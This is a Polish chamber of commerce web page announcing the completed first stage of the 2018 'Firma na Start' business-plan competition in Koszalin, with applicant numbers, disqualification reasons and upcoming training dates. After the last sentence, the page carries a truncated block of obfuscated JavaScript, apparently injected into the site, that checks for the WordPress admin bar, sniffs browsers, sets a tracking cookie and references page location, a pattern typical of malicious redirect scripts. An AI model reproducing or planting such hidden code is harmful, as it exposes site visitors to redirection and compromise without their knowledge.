Pierwszy etap Konkursu „Firma na Start” – zakończony | Północna Izba Gospodarcza w Koszalinie

Polnocna-izba-firma-na-start-IV-edycja

Szanowni Państwo,

zakończył się już pierwszy etap Konkursu „Firma na Start” obejmujący nabór zgłoszeń oraz ich weryfikację. W ramach prowadzonego naboru  w regulaminowym terminie tj. od 13 marca  do 10 kwietnia  2018 r. – wpłynęło łącznie 35 Formularzy Zgłoszeniowych (22 w Kategorii I., 13 w Kategorii II.)

Ostatecznie po ocenie formalnej do II. Etapu Konkursu zakwalifikowanych zostało łącznie 30  Uczestników, w tym:

w Kategorii I.  tj. osoby fizyczne w wieku 18-35 lat – 18 osób

w Kategorii II. tj. uczniowie koszalińskich szkół ponadgimnazjalnych – 12 osób

Do drugiego etapu Konkursu nie zakwalifikowało się łącznie 5 osób.

W tym w Kategorii I. 4 osoby: 2 ze względu na niedopełnienie warunków formalnych zgłoszenia, 1 osoba ze względu na przekroczenie granicy wieku określonej Regulaminem oraz 1 osoba ze względu na niespełnienie warunków Regulaminu Konkursu (prowadzenie działalności gospodarczej w okresie ostatnich dwóch  lat).

Natomiast w Kategorii II. nie zakwalifikowała się 1 osoba ze względu na niedopełnienie warunków zgłoszenia zgodnie z Regulaminem.

Zgodnie z Regulaminem Konkursu wyniki pierwszego etapu tj. lista Uczestników zakwalifikowanych do drugiego etapu, zostały ogłoszone na stronie internetowej www.koszalin.pl/firma w  dniu  16.04.2018 r.

W terminie 23-26 kwietnia br. odbędą się obowiązkowe dla wszystkich uczestników szkolenia z zakresu podstaw prawnych  zakładania działalności gospodarczej oraz pisania biznesplanu.

Szkolenie to ma na celu przygotowanie uczestników do stworzenia profesjonalnego biznesplanu przedsięwzięcia. Zajęcia prowadzone są w formie warsztatowej. W trakcie szkoleń Uczestnicy mogą  również rozwiązać swoje indywidualne problemy i wątpliwości związane z pomysłem biznesowym. Dodatkowo każdemu z uczestników przysługuje jedna godzina  na konsultacje indywidualne w ramach tworzonego Biznesplanu.

Po zakończonych szkoleniach  wszyscy uczestnicy w terminie do 23 maja  br.  są zobowiązani złożyć gotowe biznesplany.

Ostatni etap Konkursu trwał będzie od 23 maja do 20 czerwca  2018 r. A obejmował będzie  ocenę formalną i merytoryczną zgłoszonych biznesplanów, prezentację swoich pomysłów przez uczestników oraz wybór przez Kapitułę Konkursową  najlepszego biznesplanu w każdej Kategorii.

O przebiegu kolejnego etapu Konkursu będziemy informować Państwa na bieżąco. 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m